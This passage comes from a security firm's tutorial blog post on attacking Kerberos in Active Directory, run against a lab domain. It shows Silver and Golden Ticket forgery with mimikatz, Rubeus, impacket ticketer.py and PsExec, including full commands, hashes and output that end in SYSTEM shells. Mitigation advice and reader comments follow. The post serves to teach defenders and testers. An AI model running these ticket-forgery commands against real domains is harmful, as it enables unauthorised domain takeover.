 '## v ##'       Vincent LE TOUX             ( <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a5d3cccbc6c0cbd18bc9c0d1cad0dde5c2c8c4ccc98bc6cac8">[email&#160;protected]</a> )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
User      : stegosaurus
Domain    : jurassic.park (JURASSIC)
SID       : S-1-5-21-1339291983-1349129144-367733775
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: b18b4b218eccad1c223306ea1916885f - rc4_hmac_nt
Service   : cifs
Target    : labwws02.jurassic.park
Lifetime  : 28/02/2019 13:42:05 ; 25/02/2029 13:42:05 ; 25/02/2029 13:42:05
-&gt; Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!
C:\Users\triceratops&gt;.\Rubeus.exe ptt /ticket:ticket.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Users\triceratops&gt;.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\stegosaurus

C:\Windows\system32&gt;
</code></pre>
<p>Additionally, the Mimikatz module <em>kerberos::ptt</em> can be used to inject the ticket instead of using Rubeus, as shown in the PTT attack section.</p>
<h3>Golden ticket</h3>
<p>The Golden ticket technique is similar to the Silver ticket one, however, in this case a TGT is crafted by using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of TGS is being able to access any service (or machine) in the domain.</p>
<p>The krbtgt account NTLM hash can be obtained from the lsass process or the NTDS.dit file of any DC in the domain. It is also possible to get that NTLM through a DCsync attack, which can be performed either with the <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump" rel="nofollow">lsadump::dcsync</a> module of Mimikatz or the impacket example <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py" rel="nofollow">secretsdump.py</a>. Usually, domain admin privileges or similar are required, no matter what technique is used.</p>
<h4>From Linux</h4>
<p>The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="cdbfa2a2b98da6aca1a4">[email&#160;protected]</a>:impacket-examples# python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for jurassic.park/stegosaurus
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in stegosaurus.ccache
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="f88a97978cb893999491">[email&#160;protected]</a>:impacket-examples# export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a1d3ceced5e1cac0cdc8">[email&#160;protected]</a>:impacket-examples# python psexec.py jurassic.park/<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="04777061636b776571767177446865662973606734362a6e71766577776d672a7465766f">[email&#160;protected]</a> -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on lab-wdc02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file goPntOCB.exe
[*] Opening SVCManager on lab-wdc02.jurassic.park.....
[*] Creating service DMmI on lab-wdc02.jurassic.park.....
[*] Starting service DMmI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

C:\Windows\system32&gt;
</code></pre>
<p>The result is similar to the Silver Ticket one, but this time, the compromised server is the DC, and could be any machine or the domain.</p>
<h4>From Windows</h4>
<p>As in silver ticket case, Mimikatz, Rubeus and PsExec can be used to launch the attack:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a1c3c4cfcbc0ccc8cfe1c6c4cfd5c8cdcac8d6c88fc2cecc">[email&#160;protected]</a> )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="3a4c5354595f544e14565f4e554f427a5d575b535614595557">[email&#160;protected]</a> )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:25b2076cda3bfd6209161a6c78a69c1c /user:stegosaurus
User      : stegosaurus
Domain    : jurassic.park (JURASSIC)
SID       : S-1-5-21-1339291983-1349129144-367733775
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 25b2076cda3bfd6209161a6c78a69c1c - rc4_hmac_nt
Lifetime  : 28/02/2019 10:58:03 ; 25/02/2029 10:58:03 ; 25/02/2029 10:58:03
-&gt; Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!
C:\Users\triceratops&gt;.\Rubeus.exe ptt /ticket:ticket.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Users\triceratops&gt;klist

Current LogonId is 0:0x50ca688

Cached Tickets: (1)

#0&gt;     Client: stegosaurus @ jurassic.park
        Server: krbtgt/jurassic.park @ jurassic.park
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent
        Start Time: 2/28/2019 11:36:55 (local)
        End Time:   2/25/2029 11:36:55 (local)
        Renew Time: 2/25/2029 11:36:55 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -&gt; PRIMARY
        Kdc Called:

C:\Users\triceratops&gt;.\PsExec.exe -accepteula \\lab-wdc02.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\stegosaurus

C:\Windows\system32&gt;
</code></pre>
<p>While I was performing this technique, sometimes seems that tickets doesn&#8217;t work. I was wondering what is happening, when I remembered reading <a href="https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html" rel="nofollow">this post</a> about the 20 minute rule for PAC validation in the DC. Then I realized that any of the failed ticket were injected after I having been performing some unrelated tasks, which it involves that between the moment I created the ticket and the moment I injected it, at least half an hour had passed. So, remember to inject the tickets after creating them.</p>
<h3>Mitigations</h3>
<p>In order to prevent or mitigate many of these Kerberos attacks a series of policies can be implemented. Some examples are the following:</p>
<ul>
<li><strong>Enable an strong password policy</strong>: First step is to avoid having weak passwords in domain user accounts. To achieve this an strong password policy should be implemented, by ensuring that complex password option is enabled on Active Directory domain. Moreover, blacklisting some common predictable terms in passwords as company names, year or months names.</li>
<li><strong>Avoid accounts without pre-authentication</strong>: If it is no completely necessary, none account must have Kerberos pre-authentication enabled. In case that this cannot be avoided, take note of these special accounts and create pseudo-random passwords with high level of complexity.</li>
<li><strong>Avoid executing services in behalf of account accounts</strong>: Avoid services that run in domain user account context. In case of using an special user account for launch domain services, generate an strong pseudo-random password for that account.</li>
<li><strong>Verify PAC</strong>: Enable PAC verification in order to avoid attacks such as Silver Ticket. To enable this check set the value <em>ValidateKdcPacSignature</em> (DWORD) in subkey <em>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters</em> to 1.</li>
<li><strong>Change passwords periodically</strong>: Set policies to ensure that user passwords are periodically modified, for example, each 2 to 4 months. As special case, <em>krbtgt</em> account password should also be changed periodically, since that key is used to create TGTs. To this purpose, the script <a class="url" href="https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51" target="_blank" rel="noopener noreferrer nofollow">https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51</a> can be used. It must be taken into account that <em>krbtgt</em> password must be modified twice to invalidate current domain tickets, for cache reasons. Another consideration is that the functional level of domain must be equal or higher than Windows Server 2008 in order to manipulate <em>krbtgt</em> account credentials.</li>
<li><strong>Disable Kerberos weak encryption types</strong>: Only Kerberos encryption with AES keys should be allowed. Furthermore, Kerberos requests with a lower level of encryption as RC4 should be monitored, due is usually used by attack tools.</li>
</ul>
<p>Additionally, Microsoft has published a guide which explains more detailed ways of preventing and mitigations this sort of attacks. It can be downloaded at <a class="url" href="https://www.microsoft.com/en-us/download/details.aspx?id=36036" target="_blank" rel="noopener noreferrer nofollow">https://www.microsoft.com/en-us/download/details.aspx?id=36036</a>.</p>
<h3>Conclussion</h3>
<p>As it has already been shown, Kerberos has an enormous attack surface that can be used by possible attackers. Therefore, it is necessary to be aware of these attack techniques in order to deploy a set of security policies that avoid and mitigate them.</p>
<p>However, the journey is not over yet. Until now, only direct attacks have been seen, and there is a Kerberos feature that allows to expand its surface: Delegation.</p>
<p>Therefore, the next post of this series will try to explain this feature and how it can be abused to steal and compromise domain accounts.</p>
<h3>References</h3>
<ul>
<li>MS-KILE: <a class="url" href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/2a32282e-dd48-4ad9-a542-609804b02cc9" target="_blank" rel="noopener noreferrer nofollow">https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/2a32282e-dd48-4ad9-a542-609804b02cc9</a></li>
<li>Impacket: <a class="url" href="https://github.com/SecureAuthCorp/impacket" target="_blank" rel="noopener noreferrer nofollow">https://github.com/SecureAuthCorp/impacket</a></li>
<li>Mimikatz: <a class="url" href="https://github.com/gentilkiwi/mimikatz" target="_blank" rel="noopener noreferrer nofollow">https://github.com/gentilkiwi/mimikatz</a></li>
<li>Rubeus: <a class="url" href="https://github.com/GhostPack/Rubeus" target="_blank" rel="noopener noreferrer nofollow">https://github.com/GhostPack/Rubeus</a></li>
<li>Invoke-Kerberoast: <a class="url" href="https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" target="_blank" rel="noopener noreferrer nofollow">https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1</a></li>
<li>Kerbrute.py: <a class="url" href="https://github.com/TarlogicSecurity/kerbrute" target="_blank" rel="noopener noreferrer">https://github.com/TarlogicSecurity/kerbrute</a></li>
<li>ticket_converter.py: <a class="url" href="https://github.com/Zer1t0/ticket_converter" target="_blank" rel="noopener noreferrer nofollow">https://github.com/Zer1t0/ticket_converter</a></li>
<li>Tickey: <a class="url" href="https://github.com/TarlogicSecurity/tickey" target="_blank" rel="noopener noreferrer nofollow">https://github.com/TarlogicSecurity/tickey</a></li>
<li>Kerberos Credential Thievery (GNU/Linux): <a class="url" href="https://www.delaat.net/rp/2016-2017/p97/report.pdf" target="_blank" rel="noopener noreferrer nofollow">https://www.delaat.net/rp/2016-2017/p97/report.pdf</a></li>
<li>Fun with LDAP and Kerberos in AD environments: <a class="url" href="https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=79" target="_blank" rel="noopener noreferrer nofollow">https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=79</a></li>
<li>20 Minute Rule PAC: <a class="url" href="https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html" target="_blank" rel="noopener noreferrer nofollow">https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html</a></li>
<li>Mimikatz and your credentials: <a class="url" href="https://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf" target="_blank" rel="noopener noreferrer nofollow">https://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf</a></li>
<li>MIT Kerberos Credential cache types: <a class="url" href="https://web.mit.edu/kerberos/krb5-devel/doc/basic/ccache_def.html" target="_blank" rel="noopener noreferrer nofollow">https://web.mit.edu/kerberos/krb5-devel/doc/basic/ccache_def.html</a></li>
<li>MIT Kerberos File ccache format: <a class="url" href="https://web.mit.edu/kerberos/krb5-devel/doc/formats/ccache_file_format.html" target="_blank" rel="noopener noreferrer nofollow">https://web.mit.edu/kerberos/krb5-devel/doc/formats/ccache_file_format.html</a></li>
<li>Detecting Kerberoasting: <a class="url" href="https://adsecurity.org/?p=3458" target="_blank" rel="noopener noreferrer nofollow">https://adsecurity.org/?p=3458</a></li>
</ul>
<p>Discover our work and <a href="https://www.tarlogic.com/cybersecurity/">cybersecurity services</a> at <a href="https://www.tarlogic.com/" target="_blank" rel="noreferrer noopener">www.tarlogic.com</a></p>
<p>In <a href="https://bit.ly/TarlogicTeo" target="_blank" rel="noreferrer noopener">TarlogicTeo</a> and <a href="https://bit.ly/TarlogicMadrid" target="_blank" rel="noreferrer noopener">TarlogicMadrid</a>.</p>
<div class="post_series">
<div class="post_series__title">More articles in this series about Kerberos</div>
<p>This article is part of a series of articles about Kerberos</p>
<ol>
<li><a href="https://www.tarlogic.com/blog/how-kerberos-works/">Kerberos (I): How does Kerberos work? &#8211; Theory</a></li>
<li>Kerberos (II): How to attack Kerberos?</li>
<li><a href="https://www.tarlogic.com/blog/kerberos-iii-how-does-delegation-work/">Kerberos (III): How does delegation work?</a></li>
</ol></div>
<div class="share_article">
<p>Share this article</p>
<div class="share_article__buttons">
<a class="facebook" href="https://www.facebook.com/sharer.php?u=https://www.tarlogic.com/blog/how-to-attack-kerberos/" target="_blank" rel="noopener noreferrer nofollow"><span class="share_article__buttons_text">Facebook</span></a> -
<a class="twitter" href="https://twitter.com/share?text=Kerberos (II): How to attack Kerberos?&url=https://www.tarlogic.com/blog/how-to-attack-kerberos/" target="_blank" rel="noopener noreferrer nofollow"><span class="share_article__buttons_text">Twitter</span></a> -
<a class="linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url=https://www.tarlogic.com/blog/how-to-attack-kerberos/&title=Kerberos (II): How to attack Kerberos?&summary=In this article about Kerberos, the following attacks against the protocol will be explained: Kerberos brute-force, ASREPRoast, Kerberoasting, Pass the key, Pass the ticket, Silver ticket and Golden ticket." target="_blank" rel="noopener noreferrer nofollow"><span class="share_article__buttons_text">Linkedin</span></a>
</div>
</div>
</div>
</article>
<aside class="section section--bg-gray">
<h5 class="section__title">Related Posts</h5>
<div class="tar_wrapper">
<div class="tar_column-4">
<link data-minify="1" rel='stylesheet' id='tar_thumb_post_product-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/2_components/thumb_post_product-3ea1882cd29189756e14d05885b39e94.css' type='text/css' media='all' />
<div class="thumb__wrapper">
<a href="https://www.tarlogic.com/blog/tracking-jndi-attacks-hunting-log4shell-in-your-network/" class="thumb__img_wrapper">
<img src="" data-src="https://www.tarlogic.com/wp-content/uploads/2021/12/research-Log4Shell.jpg" alt="Tracking JNDI attacks: Hunting Log4Shell in your network" class="lazyload thumb__img">
</a>
<h4 class="thumb__title">
<a href="https://www.tarlogic.com/blog/tracking-jndi-attacks-hunting-log4shell-in-your-network/" class="thumb__title_link">Tracking JNDI attacks: Hunting Log4Shell in your network</a>
</h4>
<span class="thumb__entry_date__author">
<time datetime="2021-12-15">15 - Dec - 2021</time>
- Threat Hunting Team
</span>
<a href="https://www.tarlogic.com/blog/tracking-jndi-attacks-hunting-log4shell-in-your-network/" class="thumb__btn">
Read more <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="6.724" height="10.889" viewBox="0 0 6.724 10.889"><defs><clipPath id="a"><path d="M0,9.61,4.156,5.445,0,1.279,1.279,0,6.724,5.445,1.279,10.889Z" fill="none" /></clipPath></defs><path d="M0,9.61,4.156,5.445,0,1.279,1.279,0,6.724,5.445,1.279,10.889Z" fill="none" /><g clip-path="url(#a)"><g transform="translate(-7.795 -6.125)"><rect width="21.778" height="21.778" fill="#fff" /></g></g></svg>
</a>
</div>
</div>
<div class="tar_column-4">
<div class="thumb__wrapper">
<a href="https://www.tarlogic.com/blog/attacking-selenium-grid/" class="thumb__img_wrapper">
<img src="" data-src="https://www.tarlogic.com/wp-content/uploads/2019/04/selenium.png" alt="Attacking QA platforms: Selenium Grid" class="lazyload thumb__img">
</a>
<h4 class="thumb__title">
<a href="https://www.tarlogic.com/blog/attacking-selenium-grid/" class="thumb__title_link">Attacking QA platforms: Selenium Grid</a>
</h4>
<span class="thumb__entry_date__author">
<time datetime="2019-04-09">09 - Apr - 2019</time>
- Marcos Carro
</span>
<a href="https://www.tarlogic.com/blog/attacking-selenium-grid/" class="thumb__btn">
Read more <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="6.724" height="10.889" viewBox="0 0 6.724 10.889"><defs><clipPath id="a"><path d="M0,9.61,4.156,5.445,0,1.279,1.279,0,6.724,5.445,1.279,10.889Z" fill="none" /></clipPath></defs><path d="M0,9.61,4.156,5.445,0,1.279,1.279,0,6.724,5.445,1.279,10.889Z" fill="none" /><g clip-path="url(#a)"><g transform="translate(-7.795 -6.125)"><rect width="21.778" height="21.778" fill="#fff" /></g></g></svg>
</a>
</div>
</div>
<div class="tar_column-4">
<div class="thumb__wrapper">
<a href="https://www.tarlogic.com/blog/interception-of-dsl-communications-synchronization-part-2/" class="thumb__img_wrapper">
<img src="" data-src="https://www.tarlogic.com/wp-content/uploads/2015/02/imagen-blog-tarlogic-2.jpg" alt="Interception of DSL Communications &amp;#8211; Synchronization &amp;#8211; Part 2" class="lazyload thumb__img">
</a>
<h4 class="thumb__title">
<a href="https://www.tarlogic.com/blog/interception-of-dsl-communications-synchronization-part-2/" class="thumb__title_link">Interception of DSL Communications &#8211; Synchronization &#8211; Part 2</a>
</h4>
<span class="thumb__entry_date__author">
<time datetime="2015-02-16">16 - Feb - 2015</time>
</span>
<a href="https://www.tarlogic.com/blog/interception-of-dsl-communications-synchronization-part-2/" class="thumb__btn">
Read more <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="6.724" height="10.889" viewBox="0 0 6.724 10.889"><defs><clipPath id="a"><path d="M0,9.61,4.156,5.445,0,1.279,1.279,0,6.724,5.445,1.279,10.889Z" fill="none" /></clipPath></defs><path d="M0,9.61,4.156,5.445,0,1.279,1.279,0,6.724,5.445,1.279,10.889Z" fill="none" /><g clip-path="url(#a)"><g transform="translate(-7.795 -6.125)"><rect width="21.778" height="21.778" fill="#fff" /></g></g></svg>
</a>
</div>
</div>
</div>
</aside>
<div class="section">
<div id="comments" class="comments-container">
<div class="fusion-title fusion-title-size-three sep-double sep-solid" style="margin-top:0px;margin-bottom:31px;">
<h3 class="title-heading-left" style="margin:0;">
3 Comments </h3>
<div class="title-sep-container">
<div class="title-sep sep-double sep-solid"></div>
</div>
</div>
<ol class="comment-list commentlist">
<li class="comment even thread-even depth-1" id="comment-23651">
<div class="the-comment">
<div class="avatar"><img alt='' src='https://secure.gravatar.com/avatar/6d2b5e145303600a05851208f02b29cf?s=54&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/6d2b5e145303600a05851208f02b29cf?s=108&#038;d=mm&#038;r=g 2x' class='avatar avatar-54 photo' height='54' width='54' /></div>
<div class="comment-box">
<div class="comment-author meta">
<strong>Smokey</strong>
4 June, 2019 at 4:29 pm<a rel='nofollow' class='comment-reply-link' href='#comment-23651' data-commentid="23651" data-postid="19268" data-belowelement="comment-23651" data-respondelement="respond" data-replyto="Reply to Smokey" aria-label='Reply to Smokey'> - Reply</a> </div>
<div class="comment-text">
<p>great reading!!!!!!! thank you for sharing!</p>
</div>
</div>
</div>
</li>
<li class="comment odd alt thread-odd thread-alt depth-1" id="comment-23704">
<div class="the-comment">
<div class="avatar"><img alt='' src='https://secure.gravatar.com/avatar/b3a647d93ad37a3943690f7cec5af476?s=54&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/b3a647d93ad37a3943690f7cec5af476?s=108&#038;d=mm&#038;r=g 2x' class='avatar avatar-54 photo' height='54' width='54' /></div>
<div class="comment-box">
<div class="comment-author meta">
<strong>Jesse</strong>
7 June, 2019 at 5:12 am<a rel='nofollow' class='comment-reply-link' href='#comment-23704' data-commentid="23704" data-postid="19268" data-belowelement="comment-23704" data-respondelement="respond" data-replyto="Reply to Jesse" aria-label='Reply to Jesse'> - Reply</a> </div>
<div class="comment-text">
<p>HiIt looks like the Mimikatz for Windows for Siverticket was accidentally replace with the Golden ticket procedure. Is that right? Or am I missing something?</p>
</div>
</div>
</div>
<ul class="children">
<li class="comment byuser comment-author-eloy-pereztarlogic-com bypostauthor even depth-2" id="comment-23707">
<div class="the-comment">
<div class="avatar"><img alt='' src='https://secure.gravatar.com/avatar/aef78b0d8eb6bff91accf3fb03a9934b?s=54&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/aef78b0d8eb6bff91accf3fb03a9934b?s=108&#038;d=mm&#038;r=g 2x' class='avatar avatar-54 photo' height='54' width='54' /></div>
<div class="comment-box">
<div class="comment-author meta">
<strong>Eloy Pérez</strong>
7 June, 2019 at 8:28 am<a rel='nofollow' class='comment-reply-link' href='#comment-23707' data-commentid="23707" data-postid="19268" data-belowelement="comment-23707" data-respondelement="respond" data-replyto="Reply to Eloy Pérez" aria-label='Reply to Eloy Pérez'> - Reply</a> </div>
<div class="comment-text">
<p>Hi, thats an excellent question because that command could be a little confusing, however it is not a mistake. Mimikatz uses the same command (kerberos::golden) to generate silver and golden tickets. It generates an TGS or TGT based on the arguments provided, more specifically, if you provide the service parameter, then a TGS will be generated. There is more information in <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos#golden--silver" rel="nofollow ugc">https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos#golden&#8211;silver</a>.</p>
</div>
</div>
</div>
</li>
</ul>
</li>
<li class="comment odd alt thread-even depth-1" id="comment-31239">
<div class="the-comment">
<div class="avatar"><img alt='' src='https://secure.gravatar.com/avatar/87931f93e04cc10cea22271aaba78270?s=54&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/87931f93e04cc10cea22271aaba78270?s=108&#038;d=mm&#038;r=g 2x' class='avatar avatar-54 photo' height='54' width='54' /></div>
<div class="comment-box">
<div class="comment-author meta">
<strong>cionsystems</strong>
12 February, 2020 at 5:19 pm<a rel='nofollow' class='comment-reply-link' href='#comment-31239' data-commentid="31239" data-postid="19268" data-belowelement="comment-31239" data-respondelement="respond" data-replyto="Reply to cionsystems" aria-label='Reply to cionsystems'> - Reply</a> </div>
<div class="comment-text">
<p>Thanks for sharing Active directory auditor tips. for more info i rfer cion systems Active directory auditor in USA.</p>
</div>
</div>
</div>
</li>
<li class="comment even thread-odd thread-alt depth-1" id="comment-51525">
<div class="the-comment">
<div class="avatar"><img alt='' src='https://secure.gravatar.com/avatar/16c2f3253452492e8e28c44e4c7e3bac?s=54&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/16c2f3253452492e8e28c44e4c7e3bac?s=108&#038;d=mm&#038;r=g 2x' class='avatar avatar-54 photo' height='54' width='54' /></div>
<div class="comment-box">
<div class="comment-author meta">
<strong>Jorko: Wonderchimp</strong>
12 March, 2020 at 4:34 am<a rel='nofollow' class='comment-reply-link' href='#comment-51525' data-commentid="51525" data-postid="19268" data-belowelement="comment-51525" data-respondelement="respond" data-replyto="Reply to Jorko: Wonderchimp" aria-label='Reply to Jorko: Wonderchimp'> - Reply</a> </div>
<div class="comment-text">
<p>Excellent article! Great job of organizing all this data in an easy to read format!</p>
</div>
</div>
</div>
</li>
</ol>
</div>
<div id="respond" class="comment-respond">
<h3 id="reply-title" class="comment-reply-title">Leave a comment <small><a rel="nofollow" id="cancel-comment-reply-link" href="/blog/how-to-attack-kerberos/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://www.tarlogic.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><div id="comment-textarea"><textarea name="comment" id="comment" cols="45" rows="8" aria-required="true" required="required" tabindex="0" class="textarea-comment"></textarea><label for="comment">Your comment</label><span></span></div><input name="wpml_language_code" type="hidden" value="en" /><div id="comment-input"><div class="comment-input"><input id="author" name="author" type="text" value="" size="30" aria-required='true' required='required' /><label for="author">Your name</label><span></span></div>
<div class="comment-input"><input id="email" name="email" type="email" value="" size="30" aria-required='true' required='required' /><label for="email">Your email</label><span></span></div>
<div class="comment-input"><input id="url" name="url" type="url" value="" size="30" /><label for="url">Web site</label><span></span></div></div>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="comment-submit" class="fusion-button fusion-button-default" value="Your comment" /> <input type='hidden' name='comment_post_ID' value='19268' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="d48365c1b6" /></p><input type="hidden" id="ak_js" name="ak_js" value="59" /><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form> </div>
</div>
</section>
<link data-minify="1" rel='stylesheet' id='tar-footer-new-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/3_layouts/footer-new-7146805d6278851ef407a633fe1d5322.css' type='text/css' media='all' />
</main>
<footer>
<div class="mapa">
<div id="footer_map_offices" style="height: 450px;width: 100%;position: relative;overflow: hidden;"></div>
</div>
<div class="footer_info">
<picture>
<source data-srcset="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/footer_bg_l.jpg" media="(min-width: 75rem)" />
<source data-srcset="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/footer_bg_m.jpg" media="(min-width: 56.25rem)" />
<img width="1920" height="751" src="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/footer_bg_blur.jpg" data-src="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/footer_bg_s.jpg" class="footer_info__background lazyload" alt="" />
</picture>
<div class="footer_info__container">
<div class="wrapper footer_info__columns">
<div>
<svg xmlns="https://www.w3.org/2000/svg" width="229.662" height="83.558" viewBox="0 0 229.662 83.558">
<g id="tarlogic_logo_white" transform="translate(-6607.973 -1592.841)">
<path id="Sustracción_1" data-name="Sustracción 1" d="M6199.223,1844.162v-14.839l23.562-21.481v16.639l-23.56,19.681Zm22.3-33.119-21.055,18.8v11.719l21.055-17.707v-12.811Z" transform="translate(408.75 -215)" fill="#fff"></path>
<path id="Trazado_4812" data-name="Trazado 4812" d="M6655.089,1620.253l-23.555-19.677v-.007l0,0,0,0v.007l-23.555,19.677,9.532,3.49,14.026-11.717,13.843,11.784Z" transform="translate(0 9.053)" fill="#00bfb3"></path>
<path id="Sustracción_2" data-name="Sustracción 2" d="M6217.37,1862.231,6199.224,1823l18.148-15.159v54.39Zm-1.053-52.123-15.688,13.322,15.688,33.933v-47.255Z" transform="translate(414.163 -186.395)" fill="#fff" stroke="rgba(0,0,0,0)" stroke-miterlimit="10" stroke-width="1"></path>
<g id="Grupo_1944" data-name="Grupo 1944" transform="translate(6668.303 1616.47)">
<path id="Trazado_4814" data-name="Trazado 4814" d="M6635.342,1603.724h18.12v6.01h-6.1v17.011h-6.038v-17.011h-5.981Z" transform="translate(-6635.342 -1603.724)" fill="#fff"></path>
<path id="Trazado_4815" data-name="Trazado 4815" d="M6644.2,1626.729l10.729-22.991h2.73l10.821,22.991h-6.041l-1.408-3h-9.415l-1.378,3Zm9.782-8.092h4.686l-2.326-5.059Z" transform="translate(-6625.129 -1603.708)" fill="#fff"></path>
